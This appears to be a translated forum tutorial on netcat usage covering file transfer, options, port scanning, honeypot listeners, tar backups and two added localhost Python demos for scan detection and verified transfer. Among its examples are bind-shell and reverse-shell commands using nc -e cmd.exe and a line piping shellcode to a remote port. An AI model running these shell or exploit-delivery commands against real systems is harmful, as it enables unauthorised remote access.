[Share] Using nc under Linux

Source: Internet
Author: User

Today, while browsing around, I saw a post about using nc under Linux to transfer files, and learned a bit from it.
Sending side:
cat test.txt | nc -l -p 6666
or: nc -l -p 6666 < test.txt (on some versions the -p option is not available here)
nc now listens on port 6666 and waits for a connection (assume the sender's IP is 10.20.133.152).
Receiving side:
nc 10.20.133.152 6666 > test1.txt
With the above, the file test.txt is transferred from the sender to the receiver and saved there as test1.txt.

To connect somewhere: nc [-options] hostname port[s] [ports] ...
To bind a port and wait for a connection: nc -l -p port [-options] [hostname] [port]

Syntax: nc [-hlnruz] [-g <gateway...>] [-G <pointer>] [-i <delay seconds>] [-o <output file>] [-p <port>] [-s <source address>] [-v...] [-w <timeout seconds>] [hostname] [port...]
Additional note: this command can also set router-related parameters (the source-routing options below).
Options
-g <gateway>  Set a source-routing hop gateway; up to 8 can be given.
-G <pointer>  Set the source-route pointer; must be a multiple of 4.
-h  Online help.
-i <delay seconds>  Set the interval between lines sent and between ports scanned.
-l  Listen mode, for inbound connections.
-n  Use numeric IP addresses only, without consulting the domain name server.
-o <output file>  Write the transferred data to the given file as a hexadecimal dump.
-p <port>  Set the local port used by this host.
-r  Choose the local and remote ports at random.
-s <source address>  Set the local IP address used to send packets.
-u  Use the UDP transport protocol.
-v  Verbose; display the command's progress.
-w <timeout seconds>  Set how long to wait for a connection.
-z  Zero-I/O mode; only used when scanning ports.

In addition, nc can also be used for port scanning:
nc -v -z -w2 10.20.133.152 1-14000
scans TCP ports 1 through 14000 on host 10.20.133.152;

nc -u -v -z -w2 10.20.133.152 1-14000
scans UDP ports 1 through 14000 on host 10.20.133.152.

nc is a very good network probing tool; its detailed usage follows.
Running 'nc.exe -h' shows how each option is used.
Basic format: nc [-options] hostname port [ports] ...
nc -l -p port [options] [hostname] [port]
-d  Background (detached) mode
-e prog  Program to execute once connected [dangerous!!]
-g gateway  Source-routing hop point(s), up to 8
-G num  Source-routing pointer: 4, 8, 12, ...
-h  Help information
-i secs  Delay interval for lines sent and ports scanned
-l  Listen mode, for inbound connections
-L  Keep listening after the connection is closed
-n  Numeric IP addresses only; hostnames cannot be used
-o file  Record a hexadecimal dump of the traffic to file
-p port  Local port number
-r  Randomize local and remote ports
-s addr  Local source address
-t  Answer telnet negotiation (telnet interactive mode)
-u  UDP mode
-v  Verbose output; use -v twice for more detail
-w secs  Timeout in seconds
-z  Zero-I/O mode (input and output turned off), for scanning
A port can also be written as a range in the form m-n.
1) Connect to a remote host
Format: nc -nvv 192.168.x.x 80
Explanation: connects to TCP port 80 of 192.168.x.x
2) Listen on the local host
Format: nc -l -p 80
Explanation: listens on TCP port 80 of this machine
3) Scan a remote host
Format: nc -nvv -w2 -z 192.168.x.x 80-445
Explanation: scans all ports of 192.168.x.x from TCP 80 to TCP 445
4) Bind a shell on the remote host, example:
Format: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
Explanation: binds the remote host's cmd shell to TCP port 5354 of that remote host
5) Bind a shell on the remote host with a reverse connection, example:
Format: nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: binds the remote host's cmd shell and connects back to 192.168.x.x on TCP port 5354
These are some of the most basic uses (in fact nc has many more; combined with the pipe "|" and the redirection operators "<" and ">", it becomes far more powerful).
6) Attack application, example:
Format 1: type.exe c:\exploit.txt | nc -nvv 192.168.x.x 80
Format 2: nc -nvv 192.168.x.x 80 < c:\exploit.txt
Explanation: connects to port 80 of 192.168.x.x and sends the contents of 'c:\exploit.txt' through its pipe (the two formats have the same effect, they just look different :P)
Note: 'c:\exploit.txt' holds shellcode or similar.
7) Honeypot use [1], example:
Format: nc -L -p 80
Explanation: with '-L' (note that L is uppercase) nc keeps listening on a port until Ctrl+C
8) Honeypot use [2], example:
Format: nc -L -p 80 > c:\log.txt
Explanation: with '-L' nc keeps listening on a port until Ctrl+C and writes what it receives to 'c:\log.txt'; change '>' to '>>' to append to the log
Note: 'c:\log.txt' is the log file.
9) Honeypot use [3], example:
Format 1: nc -L -p 80 < c:\honeypot.txt
Format 2: type.exe c:\honeypot.txt | nc -L -p 80
Explanation: with '-L' nc keeps listening on a port until Ctrl+C and 'sends' the contents of 'c:\honeypot.txt' to whoever connects!
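The scanning commands above (nc -v -z -w2 HOST 1-14000) and the honeypot listeners (nc -L -p 80 > log.txt) are two sides of the same exchange: the scanner completes a TCP connect and closes without sending anything, and the listener only ever sees a connection with no data. The following added example (not part of the original post) reproduces both sides with plain sockets on 127.0.0.1 so it runs offline: connect_scan() does what -z with a -w timeout does, start_listener() records what a logging listener would see, and detect_scanners() shows the check a defender would run over that log. The thresholds (3 distinct ports within 5 seconds) and the number of listeners are assumptions chosen for the demo.

```python
"""Connect scan versus listener-side logging, reproduced with plain sockets.

Added example, not from the original post. Everything stays on 127.0.0.1 and
all listeners and thresholds are constructed here for the demonstration.
"""
import socket
import threading
import time
from collections import defaultdict


def start_listener(log, stop):
    """Honeypot-style listener (what `nc -L -p PORT > log.txt` records).

    Accepts connections, logs (timestamp, peer address, local port, first
    bytes) and closes. Returns the OS-chosen port it listens on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(5)
    srv.settimeout(0.2)                 # so the loop can notice `stop`
    port = srv.getsockname()[1]

    def run():
        while not stop.is_set():
            try:
                conn, peer = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(0.2)
                try:
                    first = conn.recv(1024)   # b"" for a zero-I/O scan
                except socket.timeout:
                    first = b""
            log.append((time.time(), peer[0], port, first))
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def connect_scan(host, ports, timeout=2.0):
    """Like `nc -z -w<timeout> host ports`: connect, send nothing, report."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)           # the -w2 in the post is this timeout
        try:
            s.connect((host, port))
            results[port] = "open"
        except OSError:                 # refused, unreachable or timed out
            results[port] = "closed"
        finally:
            s.close()
    return results


def detect_scanners(log, min_ports=3, window=5.0):
    """Flag sources that touched >= min_ports distinct ports within `window` s.

    Thresholds are constructed for the demo; tune them to real traffic.
    """
    by_src = defaultdict(list)
    for ts, src, port, _ in log:
        by_src[src].append((ts, port))
    flagged = []
    for src, hits in by_src.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                flagged.append(src)
                break
    return flagged


def run_demo():
    """Three logging listeners plus one closed port, scanned, then analysed."""
    log, stop = [], threading.Event()
    open_ports = sorted(start_listener(log, stop) for _ in range(3))
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))        # reserve and release: a closed port
    closed_port = probe.getsockname()[1]
    probe.close()
    results = connect_scan("127.0.0.1", open_ports + [closed_port])
    deadline = time.time() + 5.0
    while len(log) < len(open_ports) and time.time() < deadline:
        time.sleep(0.05)                # listeners log slightly after connect
    stop.set()
    return results, detect_scanners(log), closed_port


if __name__ == "__main__":
    results, flagged, closed_port = run_demo()
    for port, state in sorted(results.items()):
        print(f"port {port}: {state}")
    print("flagged sources:", flagged)
```

Note that the listener sees nothing but an empty connection from a zero-I/O scan, which is exactly why the detection keys on the number of distinct ports per source within a short window rather than on payload.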
10) Backup archive
Back up the /data folder of host A to backup.tgz on host B:
Source host: tar czf - work | nc -l -c -p 1234
Destination host: nc 192.168.0.1 1234 > a.tgz
Or:
A: tar -zcf - data | nc -l -p 4444
B: nc a 4444 > backup.tgz
After the transfer, press Ctrl+C to break the connection. This way host A never writes an intermediate archive; the data streams straight into backup.tgz. The drawback is that you cannot tell when the transfer has finished.
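The file transfer at the top of the post (cat test.txt | nc -l -p 6666 and nc HOST 6666 > test1.txt) and the backup archive here are the same mechanism: one side streams bytes into a TCP connection, the other writes everything it reads to a file, and nc adds no framing or integrity check of its own. The following added example (not part of the original post) reproduces that exchange with plain sockets on 127.0.0.1 so it runs offline, builds a gzip tar archive in memory as the constructed stand-in for `tar czf - data`, and addresses the drawback noted above: the sender shuts down its side after the last byte so the receiver sees a clean end of stream, and the receiver compares a SHA-256 digest before trusting the archive. Host, port selection and the file contents are assumptions chosen for the demo.

```python
"""`tar czf - data | nc -l -p PORT` and `nc host PORT > backup.tgz` with sockets.

Added example, not from the original post. Uses an in-memory tar archive
constructed here and a localhost connection so that it runs offline.
"""
import hashlib
import io
import socket
import tarfile
import threading


def build_archive(files):
    """Construct a gzip tar archive in memory (stand-in for `tar czf - data`)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def serve_once(payload, port_holder, ready):
    """Sender side (`nc -l -p PORT`): accept one client, stream, then close.

    shutdown(SHUT_WR) sends the FIN that tells the receiver "no more data",
    which is what the post's Ctrl+C does by hand.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    port_holder.append(srv.getsockname()[1])
    ready.set()
    conn, _ = srv.accept()
    with conn:
        conn.sendall(payload)
        conn.shutdown(socket.SHUT_WR)
    srv.close()


def receive_all(host, port, timeout=5.0):
    """Receiver side (`nc host PORT > file`): read until the peer closes."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:               # b"" means end of stream
                break
            chunks.append(chunk)
    return b"".join(chunks)


def transfer_and_verify(files):
    """Run sender and receiver, verify the digest, list the archive members.

    Returns (digest_matches, bytes_received, member_names).
    """
    payload = build_archive(files)
    expected = hashlib.sha256(payload).hexdigest()
    port_holder, ready = [], threading.Event()
    sender = threading.Thread(target=serve_once,
                              args=(payload, port_holder, ready))
    sender.start()
    ready.wait()                        # do not connect before the listener is up
    received = receive_all("127.0.0.1", port_holder[0])
    sender.join()
    ok = hashlib.sha256(received).hexdigest() == expected
    names = []
    if ok:                              # only open an archive that checked out
        with tarfile.open(fileobj=io.BytesIO(received), mode="r:gz") as tar:
            names = tar.getnames()
    return ok, len(received), names


if __name__ == "__main__":
    # Constructed sample "folder" standing in for the post's /data directory.
    sample = {"data/a.txt": b"hello\n", "data/b.bin": bytes(range(256))}
    ok, size, names = transfer_and_verify(sample)
    print(f"digest ok: {ok}, bytes: {size}, members: {names}")
```

In practice the digest is computed on the sending host (for example with sha256sum) and compared on the receiving host after the copy; that comparison is the only thing that tells you the stream was complete and unmodified, since nc itself will happily write a truncated archive.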
